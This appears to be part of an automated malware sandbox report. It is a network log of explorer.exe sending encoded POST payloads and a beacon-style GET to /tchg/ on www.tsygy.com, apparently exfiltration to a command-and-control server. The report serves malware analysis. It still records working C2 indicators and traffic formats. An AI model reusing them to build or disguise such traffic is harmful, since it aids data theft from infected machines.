                                                                                                                    Data Ascii: O0qEM=wZpDbLW1bdQH1MpJUNVyFAVkYVbdIgeLC3V4NhFkr6yBuitUg_pgQNmzlEyyI_HUJ8H3U66zJDNz2e6FxZSZgcB-AAh8BoKal53nA5nXzn2_UQXSjF(P~3dLPol4cgwutfTSDPf51AANVIjzEvoCcHlb~BkVaLUm7ggi6QzTm-UqvQ5pmyTYhomrBCjaWfbaKRpx6bT-(ZYxJIejvwuIpJVO31oK(PUBJ3B5vzwZr6EVIGB-B8FXom(Pliq9BW5T8HQopBIl1Zgf6IkA7jrZugYBBdeSNkkFlRNtLthIrLCJhfhmrEpY1nIao2fZP16DES(g7rIxrH1gqiYeVBfMq9(mocdqRID1yJvH96b3Nx2A2swiGmaCkLIzw9ZL60Vr8ua5G11IuQxVfXbTZzsxGXuPS-tRx00r5oL0cSQBENOrPaXnIlmwndaXokI3fvIKJaZ0oeSFnB7oKzA8bNkt1QeQGk7Pt3Hf96ExmUSInT0Sup0f0iEx0I4KTzkRp_ZYZJguqNU.
                                                                                                                    May 30, 2023 11:08:38.329802036 CEST456INHTTP/1.1 200 OK
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                    X-Powered-By: Nginx
                                                                                                                    Date: Tue, 30 May 2023 09:08:35 GMT
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                                    Data Ascii: a
                                                                                                                    May 30, 2023 11:08:38.329916954 CEST456INData Raw: 32 61 66 0d 0a c5 55 3f 73 d3 30 14 ff 2a c6 3d 48 7b d7 c4 92 25 39 96 9d 78 29 cc 30 74 61 74 6d 25 11 75 2c 63 2b 75 d2 91 8d a1 ac 2c 4c b0 74 68 cb c0 50 0e 8e eb 97 81 36 4c 7c 05 24 d9 40 da 2b 3d b8 eb 5d 3d f8 67 e9 fd fb e9 bd a7 e7 1f
                                                                                                                    Data Ascii: 2afU?s0*=H{%9x)0tatm%u,c+u,LthP6L|$@+=]=g>~5,5fy5'RuQOcRJ*h X`BFEU\z05zCO(1)op2@KI?8)lQ2l+dwMKSV%%/$%E?jd
                                                                                                                    May 30, 2023 11:08:38.329998016 CEST456INData Raw: 38 0d 0a ee 6a 61 23 a4 06 00 00 0d 0a
                                                                                                                    Data Ascii: 8ja#
                                                                                                                    May 30, 2023 11:08:38.330065966 CEST456INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    13192.168.11.204977223.104.137.18580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:40.849282980 CEST463OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.tsygy.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.tsygy.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.tsygy.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 77 5a 70 44 62 4c 57 31 62 64 51 48 31 4d 70 4a 55 4e 56 79 46 41 56 6b 59 56 62 64 49 67 65 4c 43 33 56 34 4e 68 46 6b 72 36 36 42 76 52 56 55 67 63 42 67 52 4e 6d 7a 70 6b 79 7a 49 5f 47 57 4a 38 66 4a 55 36 48 4d 4a 41 35 7a 32 4a 6d 46 77 72 4b 5a 31 73 42 5f 63 51 68 2d 4c 49 4b 33 6c 35 79 2d 41 35 43 67 7a 55 71 5f 56 54 6a 53 6e 30 28 51 39 6e 64 4e 50 6f 6c 30 59 67 78 52 74 66 65 50 44 50 62 35 31 46 49 4e 56 36 72 7a 58 4d 41 43 56 33 6c 55 78 68 6b 47 52 72 56 55 37 67 6b 59 36 51 7a 44 6d 5f 51 71 76 51 5a 70 30 6c 48 58 69 49 6d 72 4f 53 6a 64 53 66 57 54 4b 51 46 70 36 62 6e 2d 28 61 49 78 4c 6f 65 6a 35 42 75 4a 68 4a 56 49 6c 46 70 4b 37 50 6f 4a 4a 33 55 41 76 32 6f 5a 71 4b 41 56 4b 31 5a 2d 52 74 46 58 6c 6d 28 4a 37 53 71 55 4c 32 35 50 38 48 41 53 70 43 51 66 31 66 67 66 37 73 38 41 74 57 4c 59 71 41 59 39 45 64 66 51 4a 6c 59 4a 6c 51 67 79 4c 74 68 59 72 4a 75 4a 68 72 6c 6d 71 46 70 66 30 58 49 64 6b 57 65 54 42 56 32 7a 45 53 6a 34 37 6f 59 68 72 45 5a 67 37 79 59 65 51 69 33 50 39 39 7e 73 33 4d 63 31 63 6f 43 76 79 4a 69 73 39 2d 44 6e 4f 43 69 41 31 34 55 69 51 57 62 55 76 4c 49 33 7e 64 5a 4e 7e 30 56 72 38 75 6e 43 47 31 78 49 75 68 35 56 65 6b 7a 54 64 69 73 78 56 48 75 42 53 2d 74 4d 78 30 4a 66 35 6f 79 6c 63 53 41 76 45 50 69 72 50 50 28 6e 4c 6b 6d 7a 72 4e 61 50 73 6b 4a 76 52 50 46 63 4a 61 56 38 6f 65 69 5f 6b 32 44 6f 4c 7a 51 38 4b 64 6b 75 67 41 65 58 50 45 37 64 6e 58 4b 47 39 36 59 68 6d 58 50 54 6e 54 63 53 7e 65 5a 48 74 54 34 51 68 2d 63 32 61 56 4e 47 6e 66 4a 50 4d 5a 49 56 72 59 4e 43 47 50 65 6e 33 62 69 6f 35 76 35 73 28 45 6f 31 58 6f 59 7a 79 67 35 6f 4b 49 28 4c 6d 4f 6d 6d 6b 76 38 61 6f 76 39 56 46 64 4b 42 33 64 58 41 74 4c 75 58 71 74 56 43 58 4d 56 34 38 33 67 55 32 62 32 41 48 7a 4d 4d 52 38 70 55 66 64 72 33 7e 32 61 70 64 58 32 6c 72 4d 58 74 62 35 76 76 59 65 34 30 41 55 4d 39 51 71 32 72 75 61 31 65 73 57 6e 4c 58 44 74 32 31 46 56 51 67 44 6f 44 4c 53 32 33 47 59 38 72 6e 55 36 39 47 4d 54 53 6a 36 6f 63 57 70 49 58 61 75 65 69 70 4c 50 63 31 69 79 6f 55 62 6d 6a 36 6a 58 37 31 72 75 59 55 36 7e 78 7a 31 6c 61 68 57 4b 42 30 58 61 61 51 47 6a 75 6e 34 7a 74 32 72 6d 43 28 6d 62 4b 4a 37 75 66 69 6a 56 72 5a 55 6b 63 4f 6d 4d 5a 66 74 57 46 6e 68 32 4d 52 51 44 58 28 39 4b 77 6c 69 6d 4d 64 67 43 52 6b 6f 46 69 4b 67 38 55 34 59 57 58 74 66 41 33 49 5a 37 4c 46 66 77 46 4f 78 51 46 71 6e 58 66 64 64 63 59 34 57 38 44 53 34 77 32 50 6b 64 32 31 45 46 6f 46 53 47 35 4a 73 54 69 49 62 6a 38 77 41 35 68 4c 79 5a 58 6c 31 42 68 43 33 56 4c 30 58 64 54 46 61 63 6d 39 56 33 63 63 78 33 33 34 70 69 6e 28 44 54 79 32 53 62 45 6c 33 70 55 33 39 33 61 4a 4d 43 50 6f 6a 52 65 6c 55 53 4e 63 77 54 5f 74 33 44 42 78 76 4d 62 31 43 53 49 51 4e 70 72 48 4e 7a 6d 65 72 4f 5a 38 5a 4a 2d 4a 61 73 79 78 64 31 42 32 30 58 71 66 6c 53 48 72 57 4d 41 4a 56 73 78 70 74 4c 6e 58 58 58 63 34 59 76 61 4c 52 72 77 62 30 54 54 79 53 56 55 52 5f 7a 6e 65 30 4a 33 6a 38 4b 66 34 52 53 5f 5a 6d 67 48 65 6c 48 4d 61 78 5a 5a 4b 33 73 39 7a 4e 79 31 38 37 52 74 4f 52 39 34 66 4b 74 31 78 79 77 4c 55 73 62 75 73 42 34 67 51 62 4b 53 64 66 4d 46 47 30 51 67 32 36 69 69 70 6f 74 49 54 65 36 6f 53 2d 55 74 4e 53 61 45 31 4e 69 34 4b 42 7a 47 49 6d 43 72 5a 30 6b 6f 49 2d 6c 50 74 2d 6f 73 75 51 59 34 6e 37 48 54 5a 53 70 6e 4f 35 4a 47 28 6a 71 50 32 75 58 5f 77 50 73 66 77 4d 34 67 45 4a 77 35 42 50 34 72 65 4f 76 45 77 4c 46 52 76 52 44 4e 71 4b 69 41 75 70 4d 4b 28 2d 52 64 56 34 55 57 50 4a 66 64 4e 70 50 63 58 5a 42 2d 74 77 53 53 4d 55 42 4a 5a 2d 46 66 47 35 55 2d 47 41 57 66 71 4e 53 49 6a 4b 35 4c 56 55 77 55 43 39 68 46 42 69 6c 45 7e 4a 45 7a 71 55 6b 6e 53 4b 44 54 6e 77 49 77 6d 48 56 56 64 37 39 79 37 4e 67 6a 53 6f 6c 73 65 44 4b 68 71 4b 57 6c 5a 44 51 42 49 63 4c 49 68 4f 76 4c 76 4c 75 51 74 4a 37 54 69 43 4a 4a 51 6a 77 4f 28 52 78 47 4a 34 66 4d 77 39 34 5a 78 5f 36 45 39 33 44 61 59 5a 4b 44 5a 68 4e 43 33 44 35 57 58 53 6e 2d 74 4d 47 56 75 68 70 67 6f 4e 64 51 75 58 6d 34 30 41 36 6e 6c 30 72 58 75 72 6a 54 72 56 39 63 6b 67 37 6e 66 79 51 56 57
                                                                                                                    Data Ascii: O0qEM=wZpDbLW1bdQH1MpJUNVyFAVkYVbdIgeLC3V4NhFkr66BvRVUgcBgRNmzpkyzI_GWJ8fJU6HMJA5z2JmFwrKZ1sB_cQh-LIK3l5y-A5CgzUq_VTjSn0(Q9ndNPol0YgxRtfePDPb51FINV6rzXMACV3lUxhkGRrVU7gkY6QzDm_QqvQZp0lHXiImrOSjdSfWTKQFp6bn-(aIxLoej5BuJhJVIlFpK7PoJJ3UAv2oZqKAVK1Z-RtFXlm(J7SqUL25P8HASpCQf1fgf7s8AtWLYqAY9EdfQJlYJlQgyLthYrJuJhrlmqFpf0XIdkWeTBV2zESj47oYhrEZg7yYeQi3P99~s3Mc1coCvyJis9-DnOCiA14UiQWbUvLI3~dZN~0Vr8unCG1xIuh5VekzTdisxVHuBS-tMx0Jf5oylcSAvEPirPP(nLkmzrNaPskJvRPFcJaV8oei_k2DoLzQ8KdkugAeXPE7dnXKG96YhmXPTnTcS~eZHtT4Qh-c2aVNGnfJPMZIVrYNCGPen3bio5v5s(Eo1XoYzyg5oKI(LmOmmkv8aov9VFdKB3dXAtLuXqtVCXMV483gU2b2AHzMMR8pUfdr3~2apdX2lrMXtb5vvYe40AUM9Qq2rua1esWnLXDt21FVQgDoDLS23GY8rnU69GMTSj6ocWpIXaueipLPc1iyoUbmj6jX71ruYU6~xz1lahWKB0XaaQGjun4zt2rmC(mbKJ7ufijVrZUkcOmMZftWFnh2MRQDX(9KwlimMdgCRkoFiKg8U4YWXtfA3IZ7LFfwFOxQFqnXfddcY4W8DS4w2Pkd21EFoFSG5JsTiIbj8wA5hLyZXl1BhC3VL0XdTFacm9V3ccx334pin(DTy2SbEl3pU393aJMCPojRelUSNcwT_t3DBxvMb1CSIQNprHNzmerOZ8ZJ-Jasyxd1B20XqflSHrWMAJVsxptLnXXXc4YvaLRrwb0TTySVUR_zne0J3j8Kf4RS_ZmgHelHMaxZZK3s9zNy187RtOR94fKt1xywLUsbusB4gQbKSdfMFG0Qg26iipotITe6oS-UtNSaE1Ni4KBzGImCrZ0koI-lPt-osuQY4n7HTZSpnO5JG(jqP2uX_wPsfwM4gEJw5BP4reOvEwLFRvRDNqKiAupMK(-RdV4UWPJfdNpPcXZB-twSSMUBJZ-FfG5U-GAWfqNSIjK5LVUwUC9hFBilE~JEzqUknSKDTnwIwmHVVd79y7NgjSolseDKhqKWlZDQBIcLIhOvLvLuQtJ7TiCJJQjwO(RxGJ4fMw94Zx_6E93DaYZKDZhNC3D5WXSn-tMGVuhpgoNdQuXm40A6nl0rXurjTrV9ckg7nfyQVWmzjNi5M2r4c9JhkW8cgx7qmWRbQT8r8MdhHnP5aSLu5rChjyOM24z3n7aNzzhCRBmhBWLVevFPObg0hfELhO_XRlLVtl7eG1KpsM_ZUGP1jw8zfq832PrR_pJk4qooY(6q5FafnfHPSVVyvZSyJagYwifFxbyVIMwVUByGqmfxvpDrpqDO7sMwKHzZp4segtR2CWGpXWNPl(-MvtUQ5EVz3UbZ9Kh4qdE77QjHtbumI(lTAcpcC2QUoPJHcY4JFzJw1iwnnbQTdXDMuxvFUagRQHexy0Of6aNTQljjxEhYixQpq6NUfyp4xMnYHlJlin-jkcmnjEqvaGjDwx35GxrP8EN6BZf(CGab8llcIdHFV0TB5NqDl1i6tVYVY9s1hlvlzK6wRRUuPX_ahnnMWwR9kgv48~zuFDUful-54vPrfCi9j4WtaINJPNJVj0wuXek~_73MHqyMLqDPrNgY8SDdi96TT3lXmUGSZXgcO5yu2pZpoKvKB~MaZlDAAhyFjU7mQ~YchKbCOBKSoGUdR0zxBROV1VgrcUxz-HNzRU-I3o0C82_05UnUkyK7BWogtbHt6dVzygmJDnpcX3hteTvB3CeBXfgZbu0fIJFez2ZXW8UconhTBzHRxukTJuMDLUO0GD9ZhEIYa(mYkem6Y4T755CWaHexAx_4ZTz~xdihZ~UReB3DQxu5CvpiXsgb_lsJj4uxrGIE2ssTnzkw5Z3mk4vHlp42fNog00hS_cCZgzWWevQ6mwKq9UqK9BvdED8XeM9OYjx~VO0~ktOtcbW5f64693v41cVCvldlJduB3jQhuuAFTvMRYMsvELx(-HiZDLVDLSSg7Vs6-xb33d5wOg6vC244USj4egQ2SHUKjoF1tGpnzbBdttT~rAvKvXLd5gVHAh4DXa9SFhycZEhL-Xe49lnUDnmESSIl53xd3ffkJrh03GocE15sF2gK-cMO_vtD7KfJPl3jJRno8g90aodfRiaudm7O2YsL88TSaeGZKYKnylaCee76nptnLc3sqLYg7YYWHWhlivIfZ8QVsWZ78hnvYWmGLNPp8u7zP6RH9u9Vr6qu4sn4OeC2AeMwUFINlAayfQ2oymSx9TBlP(4009oJGZNokRlcEIUmG1J3g4qfEQn3dNK1s84QWMZCS8lLDx-p1IX0-4rdjzMPQ15bdkPuiN0tfvjjDp7BZlOWKt1oZwelZcHndK2JZw5YBdbz3jogMkaGtEEimqXwm3RKVi7cKHcwhybWZTk2FtUI99cZF5HKE7pIGXxV6y28K6nXSVcPKx5MmHdFo5gBYG5VQun9RZoTshO46HfoS~bVmqpl_E-OttxfoTilhiheg77KoD7tf1x3vMd9b5TH21NVGJGC0EWnid7iLtxwNpQx-3JqPPAuz88Z5E7XOSgmdw0ScixL-AUGwCCSR8gteY8OSUiMGQxG0XI8Anmn_1j8lsR3BKZsQ3gRtXfTdqWIC0Mk90tzTioqR8q~hUD4q05fTwpHQXGX7hPUwbvzzgqfR~mHQYQ~rzOqOA05eBUgSdUBmc4YAUnHeIPvJIMSpk6itl7b0Yoj1EbxoOxmuaeqmHU5xMISl0usfS4BtCL0-3PbAypfIQvavbJw-n9AGLOwexUTKnr0bcyteVywc~YI2o9QYA8ZD24Ln5-3LMnf7eXbm1HTMP4NwpvM8T8SmO3qUg39KEUgRQIbPWgtp(GnWwp9iUIWTrY9NszbqBfGlvcPzuK9R1XsICNhii_ktF1okn90iR8HzPUQ77KA69G009fh-9tdFqgMx4PBcuz8dRTTEOMIU68K-gG(oI3A98vM1obShRP(aCCeGN01Lna95el0uTHNzQz(K~iqskfUSKtlMT-g76ineBEdv11xuZz5xWFGourXoaEboqqielLpoAvoIZG8uU-w6qhdKoRTXHGOEmUK57_yoUemEpdjA1_gX5eTpab3EnuqHwQ1SThCu0doPMh7QXd93Cesms7BydZQoXOoAeIcHiRDNgpzyvZUVvz45ClGjMMVWv0S06uEOyENkYG1dsRkEyyB3Jf2iYgmv4Ok00YB0Zkic49Y03T4KKvKMGC3i~3OgcM~GtpB-A93QFGnT~pF0OsXJvROt6tefbw1E6MYCNhe032htPvepiI~PmW287ZyR0Mb0~pPOthpqsCVzZ9ArjoyMJQUohM1mk4edS3OA171hSo(4b1HR2WqeYnMfr6OpN40RMXTJyy~z9pya8ctN7Qt_diY8sA~jv2~gwGcH6XTZ2Eu4e_ISNfQK4LB-aP2dfLF5TUGWCrJ-OaVo8qkKdoQ49cHgCUb5J2QggUYxfhi3xk8kANGY2dHT7g15HYGl6s6iSGjzzQnIkVOylf(v(b67krWzsMpnmRs8X-vsAqr6pRACjISlMm~HQu2p7Lk2Jwm_0s3o57Hrj2OXB-dsTV5cSieyGWYYNlPonGIRo945PodJ2av3UVVlOQW-iGb3QN2mQpV3UsikKiDsbHXI2GkFODREEVxuI5ede4JLzOjmcTILCeeZrxZwUSFnusBz1aZ_YBaU7unEZna8(g9H3iuxgd6CbvTjHRAR7VW_ORNqBtJ1f199n66Tn9LCg1CdWuDRcX5jZUCY5wkMjap1pYrrLK8dRn0sOXzgcgEj7hJr3xSACL79NVF94lLH4NzKo-Wa(ZuqSAFkdadru2ffQg9SIB~83FFqF9fEWNqgezUu3cQKhtVpnVQSh1G4
                                                                                                                    May 30, 2023 11:08:40.849358082 CEST464OUTData Raw: 36 6a 6f 6a 73 52 61 77 43 65 46 70 36 7e 71 45 6a 4d 71 42 72 70 33 4f 6f 47 76 69 7a 7a 69 6f 78 5a 53 32 6e 52 4d 58 6c 59 53 65 58 32 65 41 76 6d 38 5a 63 72 32 42 41 53 76 34 50 6e 44 36 71 45 47 6a 2d 49 4b 28 4c 7e 7a 69 64 6b 73 4d 78 6b
                                                                                                                    Data Ascii: 6jojsRawCeFp6~qEjMqBrp3OoGvizzioxZS2nRMXlYSeX2eAvm8Zcr2BASv4PnD6qEGj-IK(L~zidksMxkEJMFiBwWRcJYOLrKfQ4x6w92MxUoDDtkKzzghGsafyOB-gDIA1Ds9Y5wobp9zvY4m34GAGPZGdKYDYWLCV1i_7rhYmrYBpBbdqRJ9zoTMZ0a_WtjymLRKVvfPCOUdRlxEb8ZUPX1damFWag5CbmG8RT23Mt8TU9(3
                                                                                                                    May 30, 2023 11:08:41.016308069 CEST471OUTData Raw: 69 57 69 35 5a 42 73 6d 46 43 70 63 34 42 70 45 4c 55 59 5a 48 6e 54 77 45 54 4f 4f 72 43 78 55 57 6e 55 64 62 69 54 72 6b 64 4a 65 39 4f 64 66 53 39 46 38 4f 67 61 28 6e 64 6e 33 6f 33 69 33 74 62 2d 63 51 51 2d 36 6e 73 55 71 6e 6d 44 51 64 67
                                                                                                                    Data Ascii: iWi5ZBsmFCpc4BpELUYZHnTwETOOrCxUWnUdbiTrkdJe9OdfS9F8Oga(ndn3o3i3tb-cQQ-6nsUqnmDQdgN2rbw~gLXZVJ8dd7_DQkN2INJIwgs6eO9jO3xdPgW7xDtIrEfbaTfHfL10P~iY99XIKJy6i9rK1n-FCuQ9VwA6_8zS7UvEFgK5yVI8DJUCQSwN_HoVuX_vnHH2I(ixGWZqxJp5cC6ji5Lez97Ecr_8gI2oVZaOL2C
                                                                                                                    May 30, 2023 11:08:41.016390085 CEST475OUTData Raw: 47 4f 6e 76 5a 49 6c 39 49 62 69 76 4f 4c 70 76 47 31 67 37 70 44 5f 50 43 57 63 77 55 39 67 57 69 42 4f 35 73 55 57 64 38 44 55 6c 70 42 51 65 75 71 37 70 64 4a 32 79 47 4d 37 72 47 6b 48 39 58 79 6d 41 6f 51 48 67 32 38 77 41 56 48 2d 37 57 6a
                                                                                                                    Data Ascii: GOnvZIl9IbivOLpvG1g7pD_PCWcwU9gWiBO5sUWd8DUlpBQeuq7pdJ2yGM7rGkH9XymAoQHg28wAVH-7Wj41fN679BixO0BMZSqf6rsYetxYzcRo5yG9xPza5SEujVopDBvVBbjInhIbkE4SVKMbAxxdGF-0xCbVZ6RCUQ8Ks1gUUmk4fmVQCEkehBHxMTysHxfaGy1FRzPr7NqroF-yABcAaVuN-DxKVDU3sCWt0j5HOdwmj7Q
                                                                                                                    May 30, 2023 11:08:41.016454935 CEST477OUTData Raw: 6d 6d 42 52 58 31 63 52 6c 73 64 4b 33 45 48 54 4b 5a 51 38 72 48 30 33 63 65 53 6f 35 70 33 35 4b 55 42 77 31 47 62 7e 71 74 4e 30 39 36 54 78 33 41 76 6c 30 46 51 62 69 61 31 41 64 48 6c 49 38 79 57 41 44 75 73 58 57 6d 47 53 6f 4d 73 4e 46 34
                                                                                                                    Data Ascii: mmBRX1cRlsdK3EHTKZQ8rH03ceSo5p35KUBw1Gb~qtN096Tx3Avl0FQbia1AdHlI8yWADusXWmGSoMsNF4GJB3VKajZZXoG1MZziye85kIycRG_5QBgtS6fRnZqgDq5fIy7yQFbqXGmg8aWjMpIYwPjD4geiVho3dHAEaeCxkS3xaObiegzG6p1jAuFPGHtlP73RUPIb59KArs6nxSJAVUmCNP-rsx3c6XmHD6Lkip5ABojtdRm
                                                                                                                    May 30, 2023 11:08:41.016685009 CEST485OUTData Raw: 4f 6c 4c 43 4d 4d 72 7e 5f 38 55 56 78 69 71 59 45 45 63 66 78 39 38 53 58 46 46 57 65 6c 49 62 42 46 7a 66 35 58 39 58 2d 36 62 30 71 33 45 6a 72 34 72 69 55 58 51 6f 6b 48 31 6c 63 4a 72 4e 74 47 54 5a 78 42 74 38 47 69 6c 58 4f 45 49 68 36 41
                                                                                                                    Data Ascii: OlLCMMr~_8UVxiqYEEcfx98SXFFWelIbBFzf5X9X-6b0q3Ejr4riUXQokH1lcJrNtGTZxBt8GilXOEIh6AIOjpTUoaYx5a6vO7raa2kIy5BBqhobntj8zBetcM9rNNsIt5d4nwI5htQXJeXwrWjiSdjr96Hd1nrnzukaEq5karaYozMQAbvPTSTjxS0i8rX0Atmn6ag8x2rfeIrWGhc0CpIjwArY3t0eubgE1QaOiSWGzM9R2VB
                                                                                                                    May 30, 2023 11:08:41.016923904 CEST485INHTTP/1.1 200 OK
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                    X-Powered-By: Nginx
                                                                                                                    Date: Tue, 30 May 2023 09:08:37 GMT
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                                    Data Ascii: a
                                                                                                                    May 30, 2023 11:08:41.017153978 CEST486INData Raw: 32 61 66 0d 0a c5 55 3f 73 d3 30 14 ff 2a c6 3d 48 7b d7 c4 92 25 39 96 9d 78 29 cc 30 74 61 74 6d 25 11 75 2c 63 2b 75 d2 91 8d a1 ac 2c 4c b0 74 68 cb c0 50 0e 8e eb 97 81 36 4c 7c 05 24 d9 40 da 2b 3d b8 eb 5d 3d f8 67 e9 fd fb e9 bd a7 e7 1f
                                                                                                                    Data Ascii: 2afU?s0*=H{%9x)0tatm%u,c+u,LthP6L|$@+=]=g>~5,5fy5'RuQOcRJ*h X`BFEU\z05zCO(1)op2@KI?8)lQ2l+dwMKSV%%/$%E?jd
                                                                                                                    May 30, 2023 11:08:41.017222881 CEST486INData Raw: 38 0d 0a ee 6a 61 23 a4 06 00 00 0d 0a
                                                                                                                    Data Ascii: 8ja#
                                                                                                                    May 30, 2023 11:08:41.017287016 CEST486INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0
                                                                                                                    May 30, 2023 11:08:41.183343887 CEST489OUTData Raw: 6c 4b 4a 48 2d 30 50 43 6d 6f 44 53 6a 63 72 7a 48 6f 6e 57 4f 56 79 44 58 66 39 49 79 70 4c 7e 36 6e 65 4f 76 42 46 61 4a 33 79 28 55 69 65 78 64 7a 69 54 79 6c 58 6f 63 67 5a 78 30 72 30 6f 67 4f 6f 6a 77 71 46 30 36 56 63 67 2d 44 72 49 4e 50
                                                                                                                    Data Ascii: lKJH-0PCmoDSjcrzHonWOVyDXf9IypL~6neOvBFaJ3y(UiexdziTylXocgZx0r0ogOojwqF06Vcg-DrINPt0gjJs58Kb8QnJ0G4clORaWfoCBcYF6EIXHWN(PP8v9PrR1(4Fl2OAML2R2UYFWkMneHbTgJweby37zMkucgEkbbxW9r-fcPTrMAkCiJ4A2tfgFAgNzvkTZdtOnu9wC9MPqlfu-l3tlJyIKohL_JZfX7Yoyv_JRv7
                                                                                                                    May 30, 2023 11:08:41.183552980 CEST495OUTData Raw: 2d 61 75 6e 30 54 6a 76 79 47 39 4a 53 6d 4c 68 63 34 4f 77 36 37 31 28 35 32 6b 64 48 64 6f 65 6d 4d 35 36 32 41 6c 53 37 67 50 4a 39 50 79 46 66 69 31 58 42 38 57 69 44 32 4a 76 54 6d 69 6c 53 48 59 50 45 7a 32 79 49 62 32 6c 74 36 65 75 66 57
                                                                                                                    Data Ascii: -aun0TjvyG9JSmLhc4Ow671(52kdHdoemM562AlS7gPJ9PyFfi1XB8WiD2JvTmilSHYPEz2yIb2lt6eufWBp4XyhlGDVIPZJjhJl_MmIsfQZ-14n-fo9lwted9-eA2EzdH5wKDsgrz2sy9cqmteYJnBuyVc2AUk6JqBhg8i6CRp57v45ofXXJdviymKHO42L3J8IJ(Cp3FHJIrQhr797Q38Uz~ANQi3W4fTinl43Xp-ynLYKLe3
                                                                                                                    May 30, 2023 11:08:41.183670044 CEST507OUTData Raw: 6b 45 75 41 5f 57 43 4e 5a 32 32 73 73 70 49 4c 48 28 66 6a 30 36 67 4c 35 33 5f 32 4d 30 50 52 79 4c 72 71 34 34 43 4f 49 53 68 4b 6c 46 56 4d 6b 36 68 44 2d 6c 6c 6c 52 65 6b 4c 70 76 38 65 41 45 6f 54 41 52 58 63 55 45 79 63 6a 6c 52 7e 64 34
                                                                                                                    Data Ascii: kEuA_WCNZ22sspILH(fj06gL53_2M0PRyLrq44COIShKlFVMk6hD-lllRekLpv8eAEoTARXcUEycjlR~d4Bz8s1sm1HzYmv68AkV8iB60GKHhvUC_bl6DNyxs22K53h27oz4e6MnhgGEiosCnkMUJO1u1XmiZ9KDuy-hflc4xMhxx6MeoxKd25IHXCdEzXjtpN-XXbhY7JZ(Fz3eCoxdLG9(cg4dZ0wqIOaph4YR3oVH6RyZRAg
                                                                                                                    May 30, 2023 11:08:41.183825970 CEST509OUTData Raw: 6f 63 41 6e 67 65 55 61 6d 67 58 39 52 48 71 69 64 79 68 45 72 4b 4c 4b 73 39 4f 74 6f 34 34 69 32 62 66 67 47 4d 6d 4b 39 44 37 67 76 4c 6a 43 56 69 63 4f 56 75 6c 6b 34 34 62 35 71 75 7a 30 67 76 5a 55 34 64 45 59 61 57 61 42 69 76 2d 42 69 66
                                                                                                                    Data Ascii: ocAngeUamgX9RHqidyhErKLKs9Oto44i2bfgGMmK9D7gvLjCVicOVulk44b5quz0gvZU4dEYaWaBiv-Bifr3NWVzlhJvN~hmfd-(6ZaT8dLGVY9gm6xkTvAQh5D6P65QPax4JEl1p6lk3q948JpYn3HAihnRCsvJy944fiFjJJjNa3d2WNETYD70RpHrVbTtjgtyTbRzcyScb5gGKa98NgVPW3HVf39FhuEyVIu2AbCCOXJ~GZc
                                                                                                                    May 30, 2023 11:08:41.183993101 CEST510OUTData Raw: 44 7e 59 71 64 48 56 75 6d 65 73 7e 74 58 4a 76 48 6d 5f 32 54 46 51 4c 4c 45 4e 7e 50 46 45 51 71 51 4d 48 70 6a 6d 4d 59 72 52 44 5f 51 37 68 2d 45 59 78 54 70 5a 33 49 7a 43 47 73 77 33 6c 54 57 71 68 69 68 30 36 4d 50 62 4a 41 67 69 62 71 46
                                                                                                                    Data Ascii: D~YqdHVumes~tXJvHm_2TFQLLEN~PFEQqQMHpjmMYrRD_Q7h-EYxTpZ3IzCGsw3lTWqhih06MPbJAgibqFW0RU0YMfV7xCYKEudVXGHEziBWZQm~4kEDLAhFW4cjgcWZGZxmjGz6xfuLinK9qDoK4zRoghACrvcdAN5Ghm6TcLCknPSCyIaWZnKCfZBo0ABjDbPc-yiobr71Y~3rpDF0FiJn62E0DUKrCprq9ZeOdsq6X(S28(T


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    14192.168.11.204977323.104.137.18580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:43.535353899 CEST511OUTGET /tchg/?O0qEM=9bBjY/6oTKgH1shIYNMDEgJDdV7IeHSSKUh5InR8itKuthEKpcsrZfSerFOqB7XzWJrnUJabB2R375fix7bupMFfJVFvNpSnug==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.tsygy.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:08:43.702383041 CEST511INHTTP/1.1 200 OK
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                    X-Powered-By: Nginx
                                                                                                                    Date: Tue, 30 May 2023 09:08:40 GMT
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                    Data Ascii: 3
